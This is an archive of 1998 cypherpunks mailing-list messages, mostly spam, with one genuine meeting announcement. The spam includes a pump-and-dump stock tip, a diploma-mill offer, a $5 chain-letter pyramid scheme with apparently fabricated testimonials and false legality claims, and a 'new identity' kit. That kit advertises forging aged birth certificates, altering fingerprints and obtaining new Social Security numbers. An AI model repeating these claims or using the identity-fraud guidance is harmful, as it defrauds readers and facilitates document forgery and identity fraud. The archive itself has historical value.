Thank you for your time.  Remember, please send us information
on your offer (please DO NOT fax it, email it only).

P.S.  If you want to find out how we got RICH from the internet
go to http://www.freeyellow.com/members2/insaneincome. 
FREE INFORMATION!  You may also email your request to
insane.income@mailexcite.com  Please state that you want
"FREE INFORMATION ON HOW TO GET RICH ON THE 
INTERNET" (Please DO NOT fax this request, email it only).

THANKS AGAIN!
financehelp@juno.com
financehelp@juno.com
financehelp@juno.com
financehelp@juno.com
financehelp@juno.com
insane.income@mailexcite.com
new.you@mailexcite.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jtsr-stock@jtsr-stock.com
Date: Wed, 18 Feb 1998 04:02:48 -0800 (PST)
To: Friend@public.com
Subject: HOT STOCK-Double Your Money By Easter!!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


You have been carefully selected to receive the following as a person obviously interested 
in this subject based upon your previous internet postings, or visits to one of our affiliate web
sites.  If you have received this message in error, please accept our apology as a 
responsible e-mailer, and reply with the word REMOVE in the subject line. You will be 
automatically excluded from future e-mailings. Thank you for your consideration and help
in making the Internet spam-free. *****

Visit http://www.jtsr-stock.com or call 888-295-6365 For Complete 
Information.

Who said opportunity only knocks once. JT's Restaurant is about to be one
of the fastest growing Restaurant chains. Under valued stock situations
presently $2.25 per share. Analysts predict stock to go as high as $5.00 
by Easter and could go up to $10.00 by end of 1998. Stock symbol JTSR on 
NASDAQ.  If you had invested just $100.00 in 1955 in Mcdonalds, it would 
be worth over $100 million today.  $1000 would be worth over $1 billion.  
Here is another opportunity for you.  Look for some exciting news shortly 
to boost this stock!!

Visit us at http://www.jtsr-stock.com or call 1-888-295-6365.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 57163566@compuserve.com
Date: Thu, 12 Feb 1998 15:54:17 -0800 (PST)
To: urn@piegytt.com
Subject: You Also Have Rights!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Are you tired of being underpaid for your hard 
work?

Do you want the admiration of your friends, relatives, 
and loved ones?

Are you seeking recognition as an accomplished and 
valued individual?

If your answer is "Yes" to any of these questions, you 
need a diploma from a higher university.

Obtain bachelors, masters, and PhD diplomas from 
prestigious non-accredited universities for as little as $125.  

The only requirement is a brief interview by phone. 

Your diploma will be decorating your wall within hours.

For details call 1-773-506-4509.

When you call, after the message, at the tone, talk 
slowly and clearly and:

1) Say that you are interested in the University 
Diploma Program.

2)  Say your name, then spell your last name.

3)  Leave your daytime and nighttime phone 
numbers including area codes.

4)  Repeat these two phone numbers.

NOTE:  Leave phone numbers that you personally 
answer.  Do NOT leave pager, beeper, or voice 
mail numbers.  

/////////////////////////////////////////////////////
The above message was brought to you by PlusNet 
Marketing & Distributors.  We market or distribute any 
product or service by bulk E-mail and by traditional 
marketing media.  For information, call 1-513-763-3862.
/////////////////////////////////////////////////////





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hugh Daniel <hugh@road.toad.com>
Date: Thu, 12 Feb 1998 01:34:33 -0800 (PST)
To: cypherpunks-announce@toad.com
Subject: ANNOUNCE: Cypherpunks February SF Bay Area Meeting
Message-ID: <199802120934.BAA28270@road.toad.com>
MIME-Version: 1.0
Content-Type: text/plain


What:  Cypherpunks San Francisco Bay area Phyical meeting
When:  Saturday February 14th, 1998 at 12:00 noon

Where: Network Associates, Inc
       Total Network Security division (formerly PGP, Inc)
       4500 Bohannon Drive, Menlo Park, California
Map:   http://maps.yahoo.com/yahoo/yt.hm?CMD=GEO&GMI=1&FAM=yahoo&SEC=geo&AD2=4500+Bohannon+Dr&AD3=Menlo+Park%2c+CA++94025-1029&GEOMC=3&recent=0
(More directions at end of email.)

Agenda:
	12:00	Random Access, Bag Lunch, Bad jokes etc.
	13:00	Linux FreeS/WAN _Tutorial_, Hugh Daniel
	15:00	Break, announcements
	15:30	OpenPGP, DDT & other NA/PGP folks
	16:30	Cypherpunks & CFP'98, group

DDT's Directions:

      Take 101 (from North or South)
      Exit at "Marsh Road/Atherton"
      Go West (young man) off exit (right exit lane coming south from SF).
      Turning to the West (away from the Bay / freeway)
      Get in Left lane immediately.
      Turn Left at very first light (Scott Drive, not far from freeway exit)
       (landmark: Shell gas station is on your right as you turn left)
      Go South on Scott ~2/3 mi (parallel to 101 freeway fence).
      Pass one Stop sign (do not turn yet).
      (landmark: Sun Microsystems has an office on the right)
	Scott curves to right, becomes Bohannon Drive.
	Turn left into first driveway: "Menlo Oak" Business Park
	Go straight through parking lot ~2-300 yds
	Curve 270 degrees around Fountain (effective left turn)
	#4500 is on left as you curve around fountain.
	Go down ~50 yds to main lobby entrance (south side of building).

	Ask reception for Dave Del Torto (call 415.730.3583 cel if any
	problem). Meeting room is behind reception area through first
	door on left. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: majordomo@bulkemailserver.com
Date: Thu, 12 Feb 1998 07:26:39 -0800 (PST)
To: Friend@public.com
Subject: Do you need a NEW IDENTITY?
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Do you need a NEW IDENTITY/NEW ID/CREDIT/PROTECTION/PRIVACY/WEALTH?

LEAVE YOUR PAST BEHIND, FOR WHATEVER REASON!
GET AWAY FROM ABUSIVE SPOUSES...FOREVER.  START A NEW LIFE.

We can help!  All of the above is in the LIFE ENHANCEMENT KIT.

The LIFE ENHANCEMENT KIT is a COMPLETE, easy step by step do it yourself
kit.  There is nothing like it on the market today!  The kit contains compiled information
from many different sources.  In fact, it contains 4 LBS. of easy to use, up-to-date
life enhancement information!!!  For those of you that would like help,
***INFORMATION ON PAYING SOMEONE TO CREATE A TOTAL NEW
IDENTITY FOR YOU is located directly after the ordering information for the 
"Life Enhancement Kit."

YOU'LL LEARN:

1.  How to DISAPPEAR FOR GOOD.  Perfectly, for whatever reasons.
2.  How to create an identity out of thin air and make it work.
3.  Make the government itself create your new identity!
4.  How to get genuine id.
5.  How to obtain any type of supportive card you need.
6.  Changing citizenship from one country to another.
7.  How to get id in your new name - LEGALLY, without going to court.
8.  Inside secrets of fingerprinting, faking, altering, removing, YES it CAN be done!
9.  A step by step method of assembling a complete package of ALTERNATE ID, based on an original birth certificate.
10. Professional methods used before only by the top espionage agents - now for YOU to use.
11. YOU'LL LEARN HOW TO CREATE A TOTALLY NEW IDENTITY
(more than 10 different ways) with every supportive document you'll need.
12. You can KEEP YOUR PRESENT IDENTITY & HAVE A 2ND IDENTITY WITHOUT THEIR
PATHS CROSSING.  Or if you choose, the present you can "die" and use only the "NEW" YOU.

BEWARE, this is not that "simple"  new id bought through the mail that your teeenage brother
uses to impress his friends.  This is REAL! Seals, stamps, etc. EVERYTHING!

You'll also learn HOW TO CREATE A NEW BIRTH CERTIFICATE and make it look
authentic with a genuine hospital seal and rubber stamp, and "age" it in the oven.

Seeing is believing, folks...

You'll even find out which social security offices in every state to take your new "created"
birth certificate to get a NEW SOCIAL SECURITY NUMBER AND CARD!  You'll find out
what other EASY TO OBTAIN documentation you'll need to take with you.  You'll even learn
what to say to the social security employees.

HURRY!  Get your new identity started now, you never know when a situation will arrive
that will cause you to need it.  BE READY!  The government is making it harder to create
identities each year, the harder it gets, the more money it's going to cost you and the more
time it will take.  GET IT NOW.  It's also a GREAT GIFT for your FRIEND OR FAMILY
who's having a hard time financially or is an abusive relationship!

***SPECIAL!!!  ALL OF THE ABOVE is contained in 5 EASY TO READ, STEP BY STEP
Books.  THE 5 BOOKS PLUS ALL OF THE FOLLOWING IS INCLUDED IN YOUR
"LIFE ENHANCEMENT KIT" FOR ONE LOW PRICE, if you order now!

CREDIT... We all need it.  How to get it, no matter what your credit file looks like now.
You will need this information to go with your NEW identity!  A NEW IDENTITY IS 
ALMOST USELESS WITHOUT ESTABLISHING CREDIT.

YOU'LL LEARN:

1.  How NEW files are created with NEW names.
2.  Banks with lowest interest rates.
3.  Cards with no annual fees.
4.  How to get UNSECURED credit NOW (INCLUDING VISA) even with bad
credit or no credit, addresses/phone numbers included.
5.  What credit cards are easiest to get.
6.  How to get a car loan or home loan with bad or little credit.  Yes, you too can have those things
regardless of what your credit reports say now.
7.  How to clear bad credit and ESTABLISH NEW CREDIT.
8.  How to find out what's on your credit file.
9.  What bankers look for on a loan application.
10. How to build a credit line of $100,000.00 OR MORE!  It's YOUR turn now.

GET ON WITH YOUR LIFE, this information will show you how.  YOU DON'T
HAVE TO KEEP PAYING FOR YOUR MISTAKES FOR THE NEXT 7-10 YEARS!

Also included in the LIFE ENHANCEMENT KIT IS:

1.  How to get a LEGITIMATE travel agent id card in any name you choose.
Use this card for HUGE DISCOUNTS, up to 90% and sometimes free, on
air fare, car rentals, hotels, cruises, amusement theme parks, ALL OVER THE WORLD!

2.  How to LEGALLY REDUCE your INCOME TAXES with an International Business
Corporation (IBC) and with an onshore corporation.  PLUS find out the MANY OTHER
BENEFITS these "legal people" can do for you  INCLUDING INTERNATIONAL
PROFITABLE WEALTH BUILDING BUSINESS OPPORTUNITIES, THAT ARE NOT
ADVERTISED IN THE USA.  These ARE NOT MLM.  You DO NOT NEED TO
RECRUIT ANYONE!

3.  Find out who can teach you how to KEEP YOUR FINANCIAL AFFAIRS PRIVATE...
MAINTAIN A LOW PROFILE... AND HOW TO HIDE IN PLAIN SIGHT!  How to keep 
most of your wealth, protect your assets and how to organize your affairs to result
in the lowest possible tax liability!  You can also find out how to LAWSUILT PROOF
YOURSELF!  Guaranteed to send a gold digger packing with his tail between his legs!

4.  Where to get information on how to LEGALLY FILE A $0.00 INCOME TAX RETURN
AND GET BACK WHAT YOU HAVE PREVIOUSLY PAID.

Plus spiritual and general tips!

ALL OF THE ABOVE, EVERYTHING FOR ONLY, HOW MUCH?   $99.95 plus $9.95 s&h
IF YOUR REQUEST IS SENT NO LATER THAN FEB. 19, 1998 (allow 10 business
days from the time we receive your request to receive your order, checks to longer) 
or ADD $15.00 for an EXPRESS ORDER (please allow 5 business days from the time we
receive your request, checks take longer).  What is it WORTH?  UNLIMITED!
CA residents add $7.75 sales tax.  For international orders add and additional $20 for
shipping.  U.S. DOLLARS ONLY.

Order by Feb. 19, 1998 and receive two FREE GIFTS REPORTS:
1.  "How to Get $1000 - $5000 FREE & CLEAR Within 30 days (It works! It takes a little
work, but it's worth it).
2.  "20 Businesses You Can Start From Home, and become RICH!"

If you order after Feb. 19, 1998 add on an additional $15.

Fax or mail your check (we take checks by fax too) or VISA/MasterCard information 
(CREDIT CARD NAME, BILLING ADDRESSES, billing addresses will be verified 
and orders will be mailed there, no exceptions, HOME PHONE NUMBER and area code are 
also required by VISA/MasterCard for order that are not in person AND CREDIT
CARD EXPIRTATION DATE), also send your email address just in case we need to contact you.

Fax number:
(209) 952-8555 (if faxing a check, fill in all of the information, 
tape it on a piece of paper, do not put tape over the check.  
Print your name and email address just in case we need to 
contact you if something is not clear on the check).  Include your mailing address if
different than address on check.  State "This is my check and I authorize your to take 
this one time draft out of my account for $______ (state the dollar amount, whatever
your wrote on the check).  It is not necessary to mail in the fax check.

Address: 
Noble State Ent.
1163 East March Lane, Suite D719
Stockton, CA 95210

You may also send us a money order by mail.

***BEFORE ORDERING ANYTHING SEE LEGAL WARNING BELOW!***
Also, with all orders, above and below state:  
"THIS IS NOT ENTRAPMENT OR A GOVERNMENT 
STING OPERATION, THIS INFORMATION WILL NOT BE USED AGAINST YOU. 
 I UNDERSTAND THERE ARE NO REFUNDS DUE TO  THE EASE OF USING 
AND/OR COPYING  THE INFORMATION."

Need HELP creating a new identity?  See below.
-----------------------------------------------------------------------------------------------------------
For a finder's fee of only $100 by Feb. 19, 1998 or $120 after, we'll have a company call you
that will CREATE A TOTAL NEW IDENTITY FOR YOU FOR ONLY $1595 (price may
go up soon, so order now if you're interested and have the money).  DO NOT send the
$1595 to us, send only the finder's fee to us of $100 or $120.  You will pay the other company 
the $1595 later. Include with your order, 3 dates and times for someone to call you and a 
phone number with  area code (NO PAGERS OR 800#'s, but phone booths are o.k. if it will 
take incoming calls because not all do).  IF YOU WANT THIS PLEASE STATE WITH ORDER 
" I WANT SOMEONE TO CREATE A NEW IDENTITY FOR ME."  Because you may get the Life 
Enhancement Kit by accident if you don't, and there are no refunds.  You may also get the 
Life Enhancement Kit (excluding the 5 new identity books) for only $25.00 plus the $100  or $120 
finder's fee, whichever is applicable. Sales tax and shipping are included.  Add $15 for EXPRESS ORDERS.

***WARNING!!!  You must be 18 years or older to purchase this information.  This information 
is provided for ENTERTAINMENT PURPOSES ONLY!  Neither the writers, producers,
or distributers assume any responsibility for the use or misuse of any information presented.
The FRAUDULENT USE OF ID IS ILLEGAL and punishable by fine and/or imprisonment!

P.S. THIS IS A ONE TIME MAILING FROM US (unless you have more than one
email address)  NO NEED TO TYPE REMOVE. 

ATTN. FLAMERS,  We don't mean to offend you,
but we ALL get unsolicited mail from the postal service EVERYDAY, this is the same
thing, it's just a part of life and IT IS NOT ILLEGAL TO DO IT.  There is really no need
to be angry.  By the way, too much anger is bad for your health, RELAX AND ENJOY
LIFE!  PEACE TO YOU!  






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 42197929@ix.netcom.com
Date: Sat, 14 Feb 1998 05:29:45 -0800 (PST)
To: Friend@public.com
Subject: Pharmaceutical, Biotech, & Laboratory Companies
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Pharmaceutical, Biotech, & Laboratories throughout the world 
use lyophilization (freeze-drying) equipment for preservation, 
concentration, and product development concepts.  Until now the
costs to employ this technology have been extremely high and 
operation has been complicated.

Ultra-Dry freeze-dryers are cost efficient, user friendly, 
portable and affordable.  These freeze-dryers are the answer to 
your needs from simple drying requirements to sterile product
development, packaging and validation.

If this information is applicable to another department in your 
organization please forward.

Explore the possibilities and click here at 
http://www.freezedry.com/html/upage1.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: EasyMoney@MoneyMakers.com
Date: Sun, 15 Feb 1998 08:08:12 -0800 (PST)
To: Friend@public.com
Subject: Sorry this took so long...call me at home when you get this...
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Alex...here is that E-Mail I got that made me the money to get my new Entertainment system you liked so much. Tell Sarah I said hello, and call me when you get this.

  I Never Thought I'd Be the One Telling You This!!
"I Invested $20 and I'm Going to Europe on My Earnings!"

Hello, Friends!

My name is Karen Liddell; I'm a 35-year-old mom, wife, and 
part-time accountant.  As a rule, I ignore all unsolicited
"junk" e-mail and use my account primarily for business. 
I received this very same e-mail countless times and 
deleted it each time.

About two months ago I received it again and, because of 
the catchy subject line,  I finally gave it my attention. 
Afterwards, I thought, "OK, I'm going to try this.  I can
certainly afford to invest $20 and there's nothing wrong 
with creating a little excess cash." I promptly mailed four
$5 bills and, after receiving the reports, paid a friend
a small fee to send bulk e-mail for me.  After reading
the reports, I also learned how to advertise for free!

Let me tell you this:  I was not prepared for the results.
Everyday for the last six weeks, my large P.O. box has been 
literally overflowing with $5 bills; many days the excess 
fills up an extra mail bin!  I am STUNNED by all the money 
that keeps rolling in!

My husband and I had been trying to save for a down payment
on a house.  Now, not only are we purchasing a house with
40% down, we're going to Venice, Italy to celebrate!

I promise you, if you follow the steps in this e-mail and
be prepared to set aside about an hour each day to follow
up (and count your money!), you will make at least as much 
money as we did. You don't need to be a whiz at the computer
but I'll bet you already are. If you can open an envelope,
remove the money, and send an e-mail, then you're on your
way to the bank. Read this e-mail a few times so you'll 
understand how easy it is. If I can do this, so can you!

                GO FOR IT NOW!!  IT REALLY WORKS!!

                Karen Liddell

The following is a copy of the e-mail I read:

  $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $
         This is a LEGAL, MONEY-MAKING PHENOMENON!!!  
    We suggest you PRINT this letter, read the directions, 
                   THEN READ THEM AGAIN!  
  $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $

You are about to embark on the most PROFITABLE and UNIQUE 
program you may ever see.  Many times over, it has proven 
its ability to generate LARGE AMOUNTS of CASH. This program
is showing fantastic appeal with a huge and ever-growing
on-line population desirous of additional income.

This is a legitimate, LEGAL, money-making opportunity.  It 
does not require you to come in contact with people, do any
selling, and you don't even have to leave the house except 
to get the mail and go to the bank!  

Simply follow the easy instructions in this letter, and 
soon your financial dreams will come true! When followed 
correctly, this electronic, multi-level marketing program 
works perfectly...100% EVERY TIME!

Thousands of people have used this program to:
    -  Raise capital to start their own business
    -  Pay off debts
    -  Buy homes, cars, etc., 

This is your chance, so don't pass it up!

     $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $
             OVERVIEW OF THIS EXTRAORDINARY  
        ELECTRONIC MULTI-LEVEL MARKETING PROGRAM    
     $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $

This is what you will do to reach financial freedom:

You will send thousands of people a product for $5.00 which 
costs next to nothing to produce and e-mail. As with all 
multi-level businesses, you will increase your business by 
building your downline and selling the products.  Every 
state in the U.S. allows you to recruit new multi- level 
business online (via your computer).

The products in this program are a series of four business 
reports costing $5.00 each.  Each order you receive via 
postal mail will include:

  * $5.00 cash
  * The name and number of the report they are ordering
  * The e-mail address where you will send them the report 
    they ordered.
  * Their postal address (a great way to build a database 
    of opportunity seekers for your future endeavors). 

To fill each order, simply e-mail the product to the buyer.
              THAT'S IT!  THE $5.00 IS YOURS!
This is the EASIEST multi-level marketing business anywhere!

  $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $
         FOLLOW THE INSTRUCTIONS EXACTLY AND BE 
       PREPARED TO REAP THE STAGGERING BENEFITS! 
  $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $

   * * * * * I  N  S  T  R  U  C  T  I  O  N  S * * * * *

1.  Order all 4 reports shown on the list below (you can't 
    sell them if you don't order them).
     
   *  For each of the 4 reports, send $5 CASH ONLY, the NAME and
      NUMBER OF THE REPORT YOU ARE ORDERING, YOUR E-MAIL
      ADDRESS, and YOUR POSTAL ADDRESS to the person whose
      name is listed under the corresponding report.

   *  Make sure you order each of the 4 reports.  You need
      all 4 reports to save on your computer and resell.

   *  Within 5 to 7 days you will receive, via e-mail, 
      each of the four reports. Save them on your computer
      so they will be accessible for you to send to the 
      thousands of people who will order them from you.

2.  IMPORTANT-- DO NOT alter the names of the people who are
    listed under each report, in any way other than is 
    instructed below in steps "a" through "f" or you will 
    lose out on the majority of your profit. Once you 
    understand how this program works, you'll also see how 
    it doesn't work if you change it. Remember, this method
    has been tested, and if you alter it, it will not work.

    a.  Look below for the listing of available reports.

    b.  After you've ordered the four reports, take this 
        advertisement and remove the name and address under 
        REPORT #4. This person has made it through the cycle
        and is no doubt counting their 50 grand!

    c.  Move the name and address under REPORT #3 down to
        REPORT #4.  

    d.  Move the name and address under REPORT #2 down to 
        REPORT #3.

    e.  Move the name and address under REPORT #1 down to
        REPORT #2.

    f.  Insert your name/address in the REPORT #1 position.

  =3D=3D> Please copy all names and addresses ACCURATELY!!! <=3D=3D

3.  Take this entire letter, including the modified list of
    names, and save it to your computer.  Make NO changes 
    to the instruction portion of this letter.
  
4.  Now you're ready to start an advertising campaign on 
    the WORLDWIDE WEB!  Advertising on the WEB is very 
    inexpensive, and there are HUNDREDS of FREE places
    to advertise. Another avenue which you could use for 
    advertising is investing in bulk e-mail services by
    paying someone a minimal charge to advertise for you. 

5.  For every $5.00 you receive, all you must do is e-mail
    them the report they ordered.  THAT'S IT!  ALWAYS 
    PROVIDE SAME-DAY SERVICE ON ALL ORDERS!  This will 
    guarantee that the e-mail THEY send out, with YOUR name
    and address on it, will be prompt because they can't
    advertise until they receive the report!

 ***************************************************************
                  AVAILABLE REPORTS    
             Order Each REPORT by NUMBER and NAME 
 ***************************************************************
Notes:
-  ALWAYS SEND $5 CASH (NO CHECKS) FOR EACH REPORT
-  Make sure the cash is concealed by wrapping it in at 
   least two sheets of paper  
-  On one of those sheets of paper, include: (a) the number
   & name of the report you are ordering, (b) your e-mail 
   address, and (c) your postal address.  It is suggested 
   that you rent a mailbox addressed to an assumed "company"
   name to avoid your name and home address being sent to
   millions of people. For an example, see the "company" 
   names listed below.
___________________________________________________________
REPORT #1 "HOW TO MAKE $250,000 THROUGH MULTI-LEVEL SALES" 

ORDER REPORT #1 FROM: 
 
      CIC
      120 Cedar Grove Ln
      Suite 314 
      Somerset NJ 08873
      
       
___________________________________________________________
REPORT #2 "MAJOR CORPORATIONS AND MULTI-LEVEL SALES"

ORDER REPORT #2 FROM:

       PAO
      149-06 24th Ave.
      Whitestone, NY 11357
  
___________________________________________________________
REPORT #3 "SOURCES FOR THE BEST MAILING LISTS"

ORDER REPORT #3 FROM:

        SSAI
       P.O. Box 1834
       Bonita, Ca.  91908-1834
   
___________________________________________________________
REPORT #4 "EVALUATING MULTI-LEVEL SALES PLANS"

ORDER REPORT #4 FROM:
          
         NDZ, Inc.
        1579F Monroe Drive
        Box 240
        Atlanta, Ga.  30324

           
___________________________________________________________
  
$ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $=
 $ $
 HERE'S HOW THIS AMAZING PROGRAM WILL MAKE YOU $MONEY$ 
$ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $=
 $ $

Let's say you start small just to see how it works. Assume 
your goal is to get 10 people on your first level. (Placing
a lot of FREE ads on the internet will EASILY get a larger
response.) Also assume that everyone in YOUR ORGANIZATION 
gets ONLY 10 downline members.  Follow this example to 
achieve the STAGGERING results below.

Level 1: your 10 members with $5. . . . . . . . . . . . .$50
Level 2: 10 members from those 10 ($5 x 100). . . . . . $500
Level 3: 10 members from those 100 ($5 x 1,000). . . .$5,000
Level 4: 10 members from those 1,000 ($5 x 10,000). .$50,000
                      THIS TOTALS    ----------->    $55,550

Remember: this assumes that the people who participate only
recruit 10 people each.  Think what will happen when they 
get 20 people to participate! Most people get 100's of 
participants!  THINK ABOUT IT!!!

       $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $
       $   TIPS FOR YOUR SUCCESS   $
       $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $

* TREAT THIS AS YOUR BUSINESS!  Be prompt, professional, 
  and follow the directions accurately.

* Send for the four reports IMMEDIATELY so you will have 
  them when the orders start coming in because:

     When you receive a $5 order, you MUST send the report
     to comply with U.S. Postal & Lottery Laws, Title 18,
     Sections 1302 and 1341 or Title 18,  Section 3005 in
     the U.S. Code, also Code of Federal Regs. vol. 16, 
     Sections 255 and 436, which state that "a product or 
     service must be exchanged for money received."

* Be patient and persistent! Follow the steps exactly and
  you WILL undoubtedly be SUCCESSFUL!

* HAVE FAITH IN YOURSELF AND KNOW YOU WILL SUCCEED!

       $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $
       $   YOUR SUCCESS GUIDELINE    $
       $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $

=3D=3D> Follow these guidelines to GUARANTEE YOUR SUCCESS <=3D=3D

If you don't receive 20 orders for REPORT #1 within 2 weeks,
keep advertising until you do.  Then, 2 weeks later, if you
receive less than 100 orders for REPORT #2, keep advertising
until you do. Once you have received 100 or more orders for
REPORT #2, YOU CAN RELAX, because the system is already 
working for you, and the $$CASH$$ will continue to roll in!

   =3D=3D> HOW YOU WILL KNOW THE PROGRAM IS WORKING <=3D=3D

Every time your name is moved down on the list, you are 
placed under a DIFFERENT report.  You can KEEP TRACK of 
your progress by watching which report people are ordering 
from you.  If you want to generate more income, send 
another batch of your advertisement (with you in the #1 
position) and start the process again!  There is no limit 
to the income you will generate from this business!

      ***************************************
        T  E  S  T  I  M  O  N  I  A  L  S  
      ***************************************

   This program does work, but you must follow it EXACTLY!
Especially the rule of not trying to place your name in a 
different position, it won't work and you'll lose a lot of 
potential income.  I'm living proof that it works.  It 
is a great opportunity to make very easy money, with little
investment.  If you participate, follow the program exactly
and you'll be on your way to financial security.
          Sean McLaughlin, Jackson, MS

     My name is Frank. My wife, Doris, and I live in 
Bel-Air, MD. I am a cost accountant with a major U.S. 
Corporation and I make pretty good money. When I received 
the program I grumbled to Doris about "junk mail." I made 
fun of the whole thing, spouting my knowledge of the 
population and percentages involved.  I "knew" it wouldn't 
work. Doris totally ignored my supposed intelligence and 
jumped in with both feet. I made merciless fun of her, and 
was ready to lay the old "I told you so" on her when the 
thing didn't work... well, the laugh was on me!  Within 
two weeks she had received over 50 responses. Within 45 
days she had received over $147,200 in $5 bills! I was 
shocked!  I was sure that I had it all figured and that it
wouldn't work.  I AM a believer now. I have joined Doris in
her "hobby."   I did have seven more years until retirement,
but I think of the "rat race" and it's not for me. We owe it
all to MLM.
           Frank T., Bel-Air, MD

    The main reason for this letter is to tell you that 
this system is honest, lawful, extremely profitable, and is
a way to get a large amount of money in a short time. I was
approached several times before I checked this out. I 
joined just to see what one could expect in return for the
minimal effort and money required.  To my astonishment, I 
received $36,470.00 in the first 14 weeks, with money still
coming in.
           Sincerely yours, Phillip A. Brown, Esq.

    Not being the gambling type, it took me several weeks
to make up my mind to participate in this plan. But being 
conservative, I decided that the initial investment was so 
little that there was no way that I wouldn't get enough 
orders to at least get my money back. Boy, was I surprised
when I found my medium-size post office box crammed with 
orders!  For awhile, it got so overloaded that I had to 
start picking up my mail at the window. I'll make more 
money this year than any 10 years of my life before. There 
simply isn't a better investment with a faster return.
         Mary Rockland, Lansing, MI

This is my third time to participate in this plan. My 
wife and I have quit our jobs, and will soon buy a home at 
the beach and live off the interest on our money.  The 
only way this plan will work for you is if you do it. For 
your sake, and for your family's sake don't pass up this 
opportunity.  Good luck and happy spending!
           Charles Fairchild, Spokane, WA

          $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $
           ORDER YOUR REPORTS TODAY AND GET  
                STARTED ON YOUR ROAD TO   
                   FINANCIAL FREEDOM!!!   
          $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 89485650@cts.com
Date: Sun, 15 Feb 1998 21:11:59 -0800 (PST)
To: Friend@public.com
Subject: Pre- approved Guaranteed Merchant Accounts ! !
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#000000"><FONT COLOR="#00FFFF" SIZE=3>

                    INCREASE YOUR SALES! !
ACCEPT  CREDIT CARDS! PRE-APPROVED APPLICATION
 Good Credit/Bad Credit/No Credit NO APPLICATION FEES

 For a Limited Time Only!!! Regular $195.00 Application Fee Waived
For This   Offer!!! PLUS FREE SET-UP FOR ACCEPTING
               CHECKS  BY FAX OR BY PHONE

  Increase Your Business By 30% to 100% Just By Accepting Credit Cards
        We Specialize in Home Based Businesses - APPLY TODAY!!!
         Accept Visa, Mastercard,  American Express, and  Discover!

 If you are interested in the merchant account please call:   (800) 400-8532
  24 HRS A DAY 7 DAYS A WEEK PLEASE LEAVE YOUR NAME, NUMBER,
  AND THE BEST TIME TO CALL YOU. Please be sure to include your source code
          CJK2929-WRN04  to ensure that your application fee is waived.
************************************************************************************************
           This  Pre-Approved  Merchant  Account Application  has
              NO  APPLICATION FEES!! This is a one time mailing.



------------------------------------------------------------------------------------------------------------------------------


 


</FONT><FONT  COLOR="#000000" SIZE=3>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: overseas@4link.net
Date: Thu, 19 Feb 1998 02:33:35 -0800 (PST)
To: Friend@public.com
Subject: AN EXCITING OVERSEAS JOB IS WAITING FOR YOU!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


CAPITALIZE ON YOUR TRUE WORTH!
**********************************************************************
Earn up to $72,000 (US Dollars) annually tax-free working abroad!
Yes, by law you are entitled to earn up to $72,000 in annual earnings
working outside of the US without paying any US income taxes.
**********************************************************************

Hundreds of companies are aggressively hiring American talent for
lucrative jobs worldwide.  After extensive research, INTERNATIONAL
RESEARCH & DATA INSTITUTE (IRDI) is now publishing its latest
edition of a directory which will provide you with key leads to a specific
recruiter or employer that can offer you a fantastic overseas career
opportunity.

International Search Firms: IRDI's Directory of International Recruiters
and Employers has a section which provides up-to-date detailed
information on executive search firms all over the world which are
currently seeking qualified candidates to fill positions for their client
companies. If they place you with one of their clients, the client pays
their search fee. It's a total win situation for you!

International Direct Job Opportunities: Our Directory has a separate
section which provides key leads directly to companies which are
currently seeking capable candidates to fill positions which they have
available outside of the US. This section includes names of staffing
executives, addresses, phone numbers and describes the types of jobs
being offered.

The listings in IRDI's Directory cover many fields:

Accounting* Chem./Petrochemical* Engineering* Oil & Gas* Advertising*
Communications* Environmental* Pharmaceuticals* Agriculture* Computers*
ESL/Education* Programming* Architecture* Contract/Admin. * Finance*
Banking* Public Relations* Automotive* Construction* Health Care*
Transportation* Aviation/Aerospace* Data Processing* Human Resources*
Business* Travel/Tourism* Management* Electronics* Nursing* Marketing*
Sales* Hospitality*
AND OTHERS!

If your target field is not listed above, contact us and we will research and
guide you to positions that are available, or feel free to email or call us
should you have a question. Email us at Research@overseaswork.com,
or email us from our website; http://www.overseaswork.com

Get the edge by acquiring our up-to-date Directory.  If you are a skilled
individual these companies would love to hear from you. They spend
hundreds of hours and tens of thousands of $$$$$$$ looking for talented
people like you in the following geographical areas:

Europe* Central America* Australia* Canada* Pacific Islands* South
